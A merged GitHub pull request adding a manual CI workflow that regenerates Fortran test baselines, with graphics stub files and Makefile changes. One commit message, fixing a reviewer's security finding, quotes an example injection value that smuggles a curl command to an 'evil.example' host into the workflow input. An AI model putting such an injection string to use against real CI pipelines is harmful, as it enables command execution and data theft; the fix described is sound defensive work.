
ci+eq+tr: workflow_dispatch baseline regen + graphics-stubs (#197) #198

Merged
k-yoshimi merged 4 commits into develop from feat/ci-regen-baselines-workflow on May 12, 2026

Owner

@k-yoshimi k-yoshimi commented May 12, 2026

Summary

Closes #197 (CI baseline regen env mismatch — clavius gfortran 13.3 vs CI gfortran 13.2 produces ~3e-9 drift on eq_tst2 / tr_tst2 profile arrays). Unblocks #190 (tr_tst2 baseline backfill).

Adds an in-CI baseline-regeneration workflow plus the Fortran graphics-stubs that let eq.x / tr2 standalone binaries build in CI's gfortran-13.2 / Ubuntu-24.04 / no-graphics environment.

Background

PR #196 attempted to resolve #190 by regenerating baselines on clavius (gfortran 13.3). CI rejected the result at 1e-10 tolerance because of compiler-version drift. The diagnostic surfaced that baselines must be generated in the same environment they will be compared against — i.e., CI's Ubuntu 24.04 + gfortran 13.2. This PR is the environment-alignment infrastructure.
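
To make the drift argument concrete, here is a minimal sketch of a tolerance check of the kind described. Only the 1e-10 tolerance and the ~3e-9 drift magnitude come from this PR; the comparator, the function name `within_tolerance`, and the sample profile values are hypothetical stand-ins for the real comparison code.

```python
import math

# Tolerance quoted in the PR background; the comparator itself is a stand-in.
TOLERANCE = 1e-10


def within_tolerance(baseline, candidate, tol=TOLERANCE):
    """Return True when every pair of values agrees to within `tol`."""
    return len(baseline) == len(candidate) and all(
        math.isclose(b, c, rel_tol=tol, abs_tol=tol)
        for b, c in zip(baseline, candidate)
    )


# Hypothetical profile values; only the ~3e-9 drift magnitude is from the PR.
ci_profile = [1.0, 0.75, 0.5, 0.25]
other_host_profile = [v * (1.0 + 3e-9) for v in ci_profile]

same_env_ok = within_tolerance(ci_profile, list(ci_profile))
cross_env_ok = within_tolerance(ci_profile, other_host_profile)
print(same_env_ok, cross_env_ok)  # True False
```

A relative drift of 3e-9 is about 30 times larger than the tolerance, so a baseline generated on a different compiler version cannot pass no matter how the run is repeated.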

Changes (5 files, 1 commit)

| File | Type | Notes |
| --- | --- | --- |
| eq/eq_static_stubs.f90 | NEW (~384 lines) | Copy of the tot/tot_static_stubs.f90 body (~378 lines, ~100 GSAF no-op SUBROUTINEs + 2 FUNCTIONs); leading comment header customized for the eq context |
| tr/tr_static_stubs.f90 | NEW (~383 lines) | Same pattern for tr |
| eq/Makefile | MODIFY (+14/-2) | Add the EQ_STATIC_STUBS_OBJ GFLIBS-empty gate (mirrors tot/Makefile:64-70); include it in the eq target deps and link line |
| tr/Makefile | MODIFY (+15/-2) | Same pattern for the tr2 target. Adaptation: uses $(OBJDIR)/tr_static_stubs.o because tr's compile rule is ${OBJDIR}/%.o: %.f90 only (eq has a flat .f90.o: rule, so eq stays unprefixed); documented inline |
| .github/workflows/regen-baselines.yml | NEW (~205 lines) | workflow_dispatch trigger with a fixtures input (default "eq_tst2 tr_tst2"); pinned runs-on: ubuntu-24.04; concurrency: + permissions: contents: read; uses the make -C tot libs canonical build chain (in-house review MED #1); narrow failure detection (test -s guard); per-module shape check (tot allows empty scalars per extract_tot_metrics.py:5-10, others require non-empty); dispatch narrowed to supported prefixes (tr_* / eq_* / tot_*; fp/ti/wr/wrx rejected with a clear error per Codex MED); actions/upload-artifact@v4 with retention-days: 90 + if-no-files-found: error |
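
The prefix dispatch and per-module shape check listed for regen-baselines.yml can be sketched in Python as follows. This is an illustration of the rules as stated here, not the workflow's actual shell/jq code: the function names, the top-level "scalars" key in metrics.json, and the fixture names other than eq_tst2 / tr_tst2 are assumptions.

```python
# Prefixes follow the PR text; function names and the "scalars" key are assumptions.
SUPPORTED_PREFIXES = ("tr_", "eq_", "tot_")
ALLOW_EMPTY_SCALARS = {"tot"}  # tot may legitimately produce no scalars


def module_for(fixture):
    """Map a fixture name to its module, rejecting unsupported prefixes."""
    for prefix in SUPPORTED_PREFIXES:
        if fixture.startswith(prefix):
            return prefix.rstrip("_")
    raise ValueError(
        f"unsupported fixture prefix: {fixture!r} (supported: tr_*, eq_*, tot_*)"
    )


def shape_ok(fixture, metrics):
    """Apply the per-module shape rule to a parsed metrics.json dict."""
    scalars = metrics.get("scalars")
    if not isinstance(scalars, dict):
        return False
    # Non-empty scalars always pass; empty scalars pass only for tot.
    return bool(scalars) or module_for(fixture) in ALLOW_EMPTY_SCALARS
```

For example, `module_for("eq_tst2")` returns `"eq"`, a hypothetical `fp_tst1` raises `ValueError`, and `shape_ok("tr_tst2", {"scalars": {}})` is `False` while the same empty dict is accepted for a `tot_*` fixture.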

Plus spec at docs/superpowers/specs/2026-05-12-ci-baseline-regen-workflow-design.md (376 lines, 4 Codex review rounds converged) and plan at docs/superpowers/plans/2026-05-12-ci-baseline-regen-workflow.md (891 lines, 12 tasks) in earlier commits on this branch.

Verification

  • mac local: gate-flip verification via make -n eq GFLIBS=""/<populated> and make -n tr2 GFLIBS=""/<populated> — stub objects appear in link line iff GFLIBS empty. Both directions confirmed.
  • mac local YAML: python3 -c "import yaml; yaml.safe_load(...)" succeeds.
  • mac local pytest matrix: 236 PASS / 92 SKIPPED / 2 pre-existing FAIL — same as develop baseline (no new failures). git diff origin/develop --name-only excludes test_pipeline.py and test_compare_metrics.py, confirming the 2 pre-existing failures are not introduced by this PR.
  • CI run (this PR): the existing python-tests.yml workflow continues to PASS (this PR does not modify it).
  • Workflow validation (manual, post-merge): trigger regen-baselines.yml from Actions UI with fixtures="eq_tst2 tr_tst2". Should complete in ~10-15 min and produce a non-empty baselines-<run-id>.zip artifact containing eq_tst2/metrics.json (12 scalars) + tr_tst2/metrics.json (14 scalars incl. AJRFT=0.0).
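
The manual post-merge check in the last bullet could be scripted along these lines. The member paths and expected scalar counts are taken from the bullet above; the helper name `check_artifact` and the assumption that each metrics.json keeps its values under a top-level "scalars" object are hypothetical.

```python
import io
import json
import zipfile

# Expected scalar counts come from the PR text; the "scalars" key is an assumption.
EXPECTED_SCALARS = {"eq_tst2": 12, "tr_tst2": 14}


def check_artifact(zip_bytes):
    """Return a list of problems found in a downloaded baselines zip (empty = OK)."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = set(zf.namelist())
        for fixture, expected in EXPECTED_SCALARS.items():
            member = f"{fixture}/metrics.json"
            if member not in names:
                problems.append(f"{member}: missing")
                continue
            scalars = json.loads(zf.read(member)).get("scalars", {})
            if len(scalars) != expected:
                problems.append(
                    f"{member}: {len(scalars)} scalars, expected {expected}"
                )
            # The PR expects tr_tst2 to carry AJRFT=0.0 among its scalars.
            elif fixture == "tr_tst2" and scalars.get("AJRFT") != 0.0:
                problems.append(f"{member}: AJRFT is not 0.0")
    return problems
```

Calling `check_artifact(open(path, "rb").read())` on the downloaded zip and requiring an empty list would catch a missing fixture or a truncated metrics file before the baselines are committed.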

Review trail

  • Brainstorming (2026-05-12): Route I + artifact upload (MVP) + configurable fixtures input.
  • Spec (4 Codex rounds converged): HIGH (ubuntu-24.04 pin), MED 8 (across rounds), LOW handful — all incorporated; R4 = NO MATERIAL FINDINGS.
  • Plan: 12-task bite-sized plan with verbatim workflow YAML embedded.
  • Per-commit reviews: spec compliance ✅; code quality found CRITICAL (incomplete make.header — fixed by copying full python-tests.yml:112-134 content) → ✅.
  • Pre-push parallel reviews: in-house (APPROVE with 2 MED follow-ups) + Codex (1 MED) — all 3 addressed in the final amend (make -C tot libs canonical chain, dropped unused PIC builds, narrowed case dispatch).

Follow-ups (post-merge)

After this PR merges:

  1. Trigger regen-baselines.yml with fixtures="eq_tst2 tr_tst2".
  2. Download the artifact, commit the metrics.json files, and remove the @pytest.mark.xfail decorator added in PR #195 (test(trlib): mirror eqlib eqdata fallback to fix silent SKIP (#192)). This cleanly closes #190 (tr_tst2 baseline: backfill AJRFT after eq_tst2 drift fix).
  3. (Optional) Extend the workflow to support fp_* / ti_* / wr_* / wrx_* fixtures: add fp_static_stubs.f90 etc. + Makefile gates. Separate scope.

🤖 Generated with Claude Code


Note

Medium Risk
Adds a new GitHub Actions workflow that builds and runs standalone Fortran binaries in CI and changes eq/tr2 link behavior when GFLIBS is empty; misconfiguration or missing stubs could break CI baseline regeneration or no-graphics builds.

Overview
Adds a new manual GitHub Actions workflow (regen-baselines.yml) to regenerate per-fixture metrics.json baselines inside CI’s pinned ubuntu-24.04/gfortran environment, then upload the regenerated files as an artifact.

Enables no-graphics CI builds of the standalone eq and tr2 binaries by adding large no-op graphics stub files (eq_static_stubs.f90, tr_static_stubs.f90) and gating their linkage in eq/Makefile and tr/Makefile when GFLIBS is empty, so baseline regen can run without graphics libraries.

Adds accompanying design/implementation documentation in docs/superpowers/specs/... and docs/superpowers/plans/... detailing the workflow, risks, and follow-up steps.

Reviewed by Cursor Bugbot for commit 82786d6. Bugbot is set up for automated code reviews on this repo.

k-yoshimi and others added 3 commits May 13, 2026 04:47
Design for issue #197 (CI vs clavius gfortran 13.2/13.3 drift):
add a workflow_dispatch CI job that regenerates baselines in CI's
own environment, sidestepping the clavius cross-host drift that
blocked PR #196.

Two-layer scope:
- Layer A (Fortran): eq_static_stubs.f90 + tr_static_stubs.f90
  mirroring tot's existing graphics-stub pattern + Makefile gates.
  Enables standalone eq.x / tr2 builds without graphics libs in CI.
- Layer B (CI): .github/workflows/regen-baselines.yml with
  workflow_dispatch trigger, configurable `fixtures` input
  (default 'eq_tst2 tr_tst2'), artifact upload of generated
  metrics.json files.

Output handoff: artifact upload (MVP). Auto-PR / auto-commit deferred.

6 files in one commit (4 Fortran + 1 yaml + 1 spec).
Approved scope from brainstorming on 2026-05-12.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Bite-sized 11-task implementation plan for the spec at
docs/superpowers/specs/2026-05-12-ci-baseline-regen-workflow-design.md
(committed 6deddeb, 4 Codex review rounds converged).

Structure:
- Pre-flight: worktree + sanity (Task 0.1)
- Phase 1 (Tasks 1-4): Layer A — eq + tr static stub files + Makefile
  GFLIBS gates. Per-file: copy from tot precedent, header adjust,
  body verify, AST sanity, Makefile edit, GFLIBS-empty smoke build.
- Phase 2 (Task 5): Layer B — full regen-baselines.yml workflow file
  embedded in the plan (~210 lines). YAML lint + referenced-file
  existence checks.
- Phase 3 (Tasks 6-7): Final verification (gate flips correctly in
  both GFLIBS directions) + single commit.
- Phase 4 (Tasks 8-10): Pre-push gate (bounded pytest + parallel
  reviewers) + push + PR.
- Phase 5 (Task 11): Trigger first workflow_dispatch + verify artifact.

Each task has exact commands, expected outputs, and (where bodies
change) full code snippets. Workflow YAML is embedded verbatim.

Self-review: spec coverage complete (each §4 component → 1+ tasks),
no placeholders (runtime values like <PR#> noted as substitutions),
names consistent across tasks.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…/ tr2 (#197)

Adds an in-CI baseline-regeneration workflow plus the Fortran
graphics-stubs that let the standalone eq / tr2 binaries build in
CI's gfortran-13.2 / Ubuntu-24.04 / no-graphics environment.

Closes #197 and unblocks the #190 (tr_tst2 baseline backfill) path
that PR #196 ran into.

Layer A (Fortran):
- eq/eq_static_stubs.f90: NEW, copy of tot/tot_static_stubs.f90 with
  comment header adjusted for eq context. ~378 lines, ~100 GSAF
  no-op SUBROUTINEs + 2 FUNCTIONs.
- tr/tr_static_stubs.f90: NEW, same pattern for tr.
- eq/Makefile, tr/Makefile: add the `ifeq ($(strip $(GFLIBS)),)`
  gate (mirror tot/Makefile:64-70) that conditionally links
  EQ_STATIC_STUBS_OBJ / TR_STATIC_STUBS_OBJ into the standalone
  binary target. With GFLIBS populated (clavius / dev hosts), gate
  expands empty -> no link impact. With GFLIBS empty (CI / no-graphics),
  links the stubs.

Layer B (CI):
- .github/workflows/regen-baselines.yml: NEW, ~210 lines.
  - workflow_dispatch trigger with `fixtures` input (default
    "eq_tst2 tr_tst2").
  - runs-on: ubuntu-24.04 (pinned, NOT ubuntu-latest), matching
    python-tests.yml's gfortran 13.2.0 environment.
  - concurrency block (mirrors python-tests.yml:15-17).
  - permissions: contents: read (least-privilege).
  - Per-module dump-path dispatch by fixture-name prefix
    (tr_* / eq_* / tot_* / fp_* / ti_* / wr_* / wrx_*).
  - Narrow failure detection: `test -s <dump>` guard distinguishes
    binary crash from expected baseline-mismatch.
  - Per-module shape check (jq): tr/eq require non-empty scalars;
    tot allows empty scalars (TR_PRESENT=0 valid per
    extract_tot_metrics.py:5-10).
  - Uploads regen-output/ as artifact (90-day retention).

Stub-duplication trade-off: 3 files (tot + eq + tr) now contain
the same ~378-line no-op stub body. Accepted per spec §3
non-goals - shared lib/ refactor is a follow-up. Stubs change
rarely (every ~6 months when a new graphics symbol appears).

Spec: docs/superpowers/specs/2026-05-12-ci-baseline-regen-workflow-design.md
(376 lines, 4 Codex review rounds converged).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@k-yoshimi
Owner Author

@cursor review

Comment thread .github/workflows/regen-baselines.yml Outdated
Comment thread .github/workflows/regen-baselines.yml
…cument env-pin divergence (Bugbot LOW)

Bugbot found 2 issues on PR #198 HEAD 98298ea:

MEDIUM (security): the `for fixture in ${{ inputs.fixtures }}` line
expanded the workflow_dispatch input directly into the shell script
body before bash parsed it. A user with write access triggering
the workflow could inject arbitrary shell commands through the
fixtures input (e.g. `eq_tst2"; curl evil.example/exfil`).
Mitigation: pass via `env: FIXTURES: ${{ inputs.fixtures }}` so
bash reads it as a normal variable. The case-statement
restriction to tr_*/eq_*/tot_* prefixes provides defense in depth.

LOW (env divergence): this workflow pins runs-on: ubuntu-24.04 to
match python-tests.yml's current gfortran 13.2.0, but
python-tests.yml uses ubuntu-latest, which will silently rotate
to a newer compiler. Documented the divergence risk inline with
the mitigation (pin python-tests.yml when GH rotates).

Same workflow file; no test impact (the Bugbot findings affect
runtime behaviour on triggered runs, not the workflow's static
YAML structure or python-tests.yml flow).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
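
The MEDIUM finding in the commit above can be reproduced outside GitHub Actions with a small Python sketch. It assumes a POSIX `sh` on PATH, uses a harmless `echo INJECTED` in place of a real payload, and models `${{ inputs.fixtures }}` expansion as plain string interpolation into the script text; the helper `run_sh` and the loop body are illustrative, not the workflow's actual step.

```python
import os
import subprocess


def run_sh(script, extra_env=None):
    """Run a POSIX shell snippet and return its stdout lines."""
    env = dict(os.environ, **(extra_env or {}))
    result = subprocess.run(
        ["sh", "-c", script], env=env, capture_output=True, text=True, check=True
    )
    return result.stdout.splitlines()


# Harmless stand-in for a malicious `fixtures` input.
payload = "eq_tst2; do :; done; echo INJECTED; for f in x"

# Unsafe: the input is pasted into the script text before the shell parses it,
# so the shell sees the payload's `;` and keywords as real syntax.
unsafe = run_sh(f'for f in {payload}; do echo "fixture:$f"; done')

# Safer: the input arrives as an environment variable and is only word-split,
# so every token is treated as a (bogus) fixture name, never as a command.
safe = run_sh('for f in $FIXTURES; do echo "fixture:$f"; done', {"FIXTURES": payload})

print(unsafe)  # contains a bare "INJECTED" line
print(safe)    # every line starts with "fixture:"
```

In the environment-variable form the bogus tokens still reach the loop body, which is where the tr_*/eq_*/tot_* case statement mentioned in the commit message rejects them.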
@k-yoshimi
Owner Author

@cursor review


@cursor cursor Bot left a comment


✅ Bugbot reviewed your changes and found no new issues!


Reviewed by Cursor Bugbot for commit 82786d6.

@k-yoshimi k-yoshimi merged commit 7a436d3 into develop May 12, 2026
3 checks passed
@k-yoshimi k-yoshimi deleted the feat/ci-regen-baselines-workflow branch May 12, 2026 23:28